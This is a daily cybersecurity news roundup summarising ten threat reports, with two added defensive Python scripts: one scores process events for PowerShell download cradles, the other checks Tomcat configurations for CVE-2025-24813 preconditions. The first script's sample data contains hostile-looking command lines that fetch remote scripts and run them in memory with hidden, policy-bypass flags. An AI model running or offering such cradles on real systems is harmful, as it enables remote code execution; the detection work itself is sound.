
Daily Cybersecurity Roundup, March 31, 2025

Whispers of espionage echo through the digital corridors as researchers revealed that the Earth Alux APT group has been wielding its VARGEIT backdoor to infiltrate government, tech, and retail sectors across Asia-Pacific and Latin America. Meanwhile, a sly predator slinks onto mobile screens in the form of a new Android malware, Crocodilus, that employs cunning social engineering to coax users into surrendering their cryptocurrency wallet seed phrases. Over in Ukraine, a different storm brews; analysts warned of a Gamaredon phishing campaign using malicious LNK files to unleash a PowerShell downloader, slipping the Remcos backdoor onto systems with surgical precision. Read on for more.

01

The Earth Alux APT group has been using a primary backdoor called VARGEIT to conduct cyber espionage, targeting government, technology, and retail sectors in Asia-Pacific and Latin America.

02

A new Android malware, Crocodilus, uses social engineering to trick users into providing their cryptocurrency wallet seed phrase, allowing attackers to take full control and drain the wallet.

03

A Gamaredon phishing campaign is targeting users in Ukraine with malicious LNK files, which run a PowerShell downloader to deliver the Remcos backdoor.

04

Cybercriminals are using the ClickFix technique to distribute various types of malware, including ransomware, info-stealers, and Qakbot, by tricking users into executing malicious commands disguised as human verification prompts.
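Items 03 and 04 end in the same observable on the endpoint: explorer.exe spawning a PowerShell download-and-execute cradle, whether the user double-clicked a malicious LNK or pasted a ClickFix "verification" command into the Run dialog. The scoring below is an added example written for this roundup, not code from either report. The Sysmon-style process-creation records are constructed, and the field names, indicator regexes and threshold are assumptions to tune against your own telemetry.

```python
"""Score process-creation events for PowerShell download cradles launched
from explorer.exe, the parent that both a ClickFix Run-dialog paste and a
double-clicked LNK produce.

Added example, not code from the roundup or the reports it summarizes.
Events are constructed to resemble Sysmon Event ID 1 records exported as
JSON; field names, indicator patterns and the threshold are assumptions.
"""
import re

# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    # ClickFix: the "verification" command a user pasted into Win+R.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "irm http://203.0.113.10/v.txt | iex" # I am not a robot'},
    # LNK-style launch: hidden, policy-bypass download-and-run cradle.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -ep bypass -NoP -c "(New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/a.ps1\')|iex"'},
    # Benign: an admin runs a script from a console, not from explorer.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    # Benign: explorer starts an interactive shell with no cradle indicators.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe"},
]

SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
INTERACTIVE_LAUNCHERS = {"explorer.exe"}  # Run dialog, desktop, LNK double-click

# Indicator patterns (illustrative, not exhaustive).
DOWNLOAD = re.compile(
    r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|bitsadmin)\b", re.I)
EXECUTE = re.compile(
    r"(\biex\b|invoke-expression|-enc(odedcommand)?\b|\bmshta\b|\brundll32\b)", re.I)
EVASION = re.compile(
    r"(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-noni(nteractive)?\b|"
    r"-e(xecution)?p(olicy)?\s+bypass)", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons) for one process-creation event.

    Each independent signal adds one point: interactive launcher parent,
    download primitive, in-memory execution primitive, hide/bypass flags.
    """
    reasons = []
    if _basename(ev.get("Image", "")) not in SHELL_IMAGES:
        return 0, reasons
    cmd = ev.get("CommandLine", "")
    if _basename(ev.get("ParentImage", "")) in INTERACTIVE_LAUNCHERS:
        reasons.append("spawned by explorer.exe (Run dialog or LNK double-click)")
    if DOWNLOAD.search(cmd):
        reasons.append("download cradle")
    if EXECUTE.search(cmd):
        reasons.append("in-memory execution")
    if EVASION.search(cmd):
        reasons.append("hidden/bypass flags")
    return len(reasons), reasons


def detect(events, threshold=3):
    """Return the events scoring at or above threshold, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"command": ev["CommandLine"], "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["score"], ", ".join(hit["reasons"]), "::", hit["command"])
```

With the default threshold of 3 only the two constructed cradles fire; the interactive shell launched from explorer.exe scores 1 and stays below it. Lower the threshold or weight the explorer.exe parent higher only after measuring how often help-desk scripts and software installers in your environment trip the other signals.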

05

A threat actor gained initial access to a corporate network through a trojanized Zoom installer served from a fake download site. The installer dropped d3f@ckloader, and BlackSuit ransomware was deployed on the ninth day of the intrusion.

06

CISA released a Malware Analysis Report on a new malware, dubbed RESURGE, that targets CVE-2025-0282 in Ivanti Connect Secure appliances. RESURGE contains the capabilities of the SPAWNCHIMERA variant but adds distinctive commands that alter its behavior.

07

The U.S. Department of Justice (DoJ) seized over $8.2 million worth of Tether cryptocurrency that had been stolen through romance baiting scams.

08

A critical RCE vulnerability, CVE-2025-24813, is being actively exploited in Apache Tomcat servers. The flaw is a path-equivalence bug in partial PUT handling: on servers where the default servlet permits writes (readonly=false, not the default) it lets an unauthenticated attacker upload a file via HTTP PUT, and where file-based session persistence is enabled the planted payload can be deserialized for remote code execution.
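For item 08, the practical question is whether a given Tomcat instance actually meets the chain of preconditions, since the default configuration does not. The checker below is an added example for this roundup, not code from the Apache Tomcat project or the roundup itself. The web.xml and context.xml snippets are constructed; the fixed-release numbers (9.0.99, 10.1.35, 11.0.3) and the init-param and Manager/Store names follow the Tomcat advisory and documentation, and the one precondition that cannot be read from configuration, a deserialization gadget on the classpath, is assumed present.

```python
"""Check a Tomcat deployment for the preconditions of CVE-2025-24813.

Added example, not code from the roundup or the Apache Tomcat project.
web.xml / context.xml samples are constructed. The checks encode the
conditions the Tomcat advisory lists for the RCE path: unpatched version,
writes enabled on the default servlet (readonly=false, off by default),
partial PUT support (allowPartialPut, on by default) and file-based session
persistence (PersistentManager + FileStore). A deserialization gadget on the
classpath is assumed; it cannot be read from config.
"""
import xml.etree.ElementTree as ET

# First fixed release per supported branch.
FIXED = {9: (9, 0, 99), 10: (10, 1, 35), 11: (11, 0, 3)}

# Constructed samples (not from any real deployment).
VULNERABLE_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param><param-name>readonly</param-name><param-value>false</param-value></init-param>
    <init-param><param-name>listings</param-name><param-value>false</param-value></init-param>
  </servlet>
</web-app>"""
# Hardened variant: writes off and partial PUT explicitly disabled.
HARDENED_WEB_XML = VULNERABLE_WEB_XML.replace(
    "<param-name>readonly</param-name><param-value>false</param-value></init-param>",
    "<param-name>readonly</param-name><param-value>true</param-value></init-param>\n"
    "    <init-param><param-name>allowPartialPut</param-name><param-value>false</param-value></init-param>")
FILE_STORE_CONTEXT_XML = """<Context>
  <Manager className="org.apache.catalina.session.PersistentManager">
    <Store className="org.apache.catalina.session.FileStore"/>
  </Manager>
</Context>"""
DEFAULT_CONTEXT_XML = "<Context/>"


def parse_version(v):
    """'9.0.98' -> (9, 0, 98); milestone tags such as '11.0.0-M26' -> (11, 0, 0)."""
    nums = [int(p) for p in v.split("-")[0].split(".")[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def version_patched(v):
    t = parse_version(v)
    fixed = FIXED.get(t[0])
    if fixed is None:   # 8.5 and older are EOL and unfixed; later majors postdate the fix
        return t[0] > 11
    return t >= fixed


def _local(tag):
    return tag.rsplit("}", 1)[-1]   # drop the javaee / jakartaee namespace


def default_servlet_params(web_xml):
    """init-params of the servlet whose class is DefaultServlet, as a dict."""
    for servlet in ET.fromstring(web_xml).iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls = "".join((c.text or "") for c in servlet if _local(c.tag) == "servlet-class").strip()
        if not cls.endswith("DefaultServlet"):
            continue
        params = {}
        for ip in servlet:
            if _local(ip.tag) == "init-param":
                kv = {_local(c.tag): (c.text or "").strip() for c in ip}
                params[kv.get("param-name", "")] = kv.get("param-value", "")
        return params
    return {}


def file_session_persistence(context_xml):
    """True when context.xml uses PersistentManager backed by a FileStore."""
    for mgr in ET.fromstring(context_xml).iter("Manager"):
        if mgr.get("className", "").endswith("PersistentManager"):
            return any(s.get("className", "").endswith("FileStore") for s in mgr.findall("Store"))
    return False


def assess(version, web_xml, context_xml):
    """Return (conditions met, True when every checkable link of the RCE chain is present)."""
    met = []
    if not version_patched(version):
        met.append(f"Tomcat {version} predates the fix (9.0.99 / 10.1.35 / 11.0.3)")
    params = default_servlet_params(web_xml)
    if params.get("readonly", "true").lower() == "false":
        met.append("DefaultServlet readonly=false: unauthenticated PUT can write files")
    if params.get("allowPartialPut", "true").lower() == "true":
        met.append("partial PUT enabled (default): path-equivalence write possible")
    if file_session_persistence(context_xml):
        met.append("PersistentManager + FileStore: a planted .session file is deserialized")
    return met, len(met) == 4


if __name__ == "__main__":
    for label, args in [("vulnerable", ("9.0.98", VULNERABLE_WEB_XML, FILE_STORE_CONTEXT_XML)),
                        ("hardened", ("9.0.99", HARDENED_WEB_XML, DEFAULT_CONTEXT_XML))]:
        met, complete = assess(*args)
        print(label, "chain complete" if complete else "chain broken", met)
```

Upgrading is the fix; setting readonly back to true, or allowPartialPut to false, breaks the chain on instances that cannot be upgraded immediately. Note that the file-write half of the bug (overwriting another upload's content) still exists on any server with writes enabled even without FileStore, so a partial result from this check is not a clean bill of health.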

09

A Python-based RAT is exploiting Discord's API capabilities, using it as a C2 infrastructure. The RAT can perform credential theft, remote command execution, system surveillance, and Discord server manipulation.

10

The Privacy Commissioner of Canada introduced an online self-assessment tool to aid businesses and federal institutions in evaluating the risk of significant harm to individuals following a privacy breach.
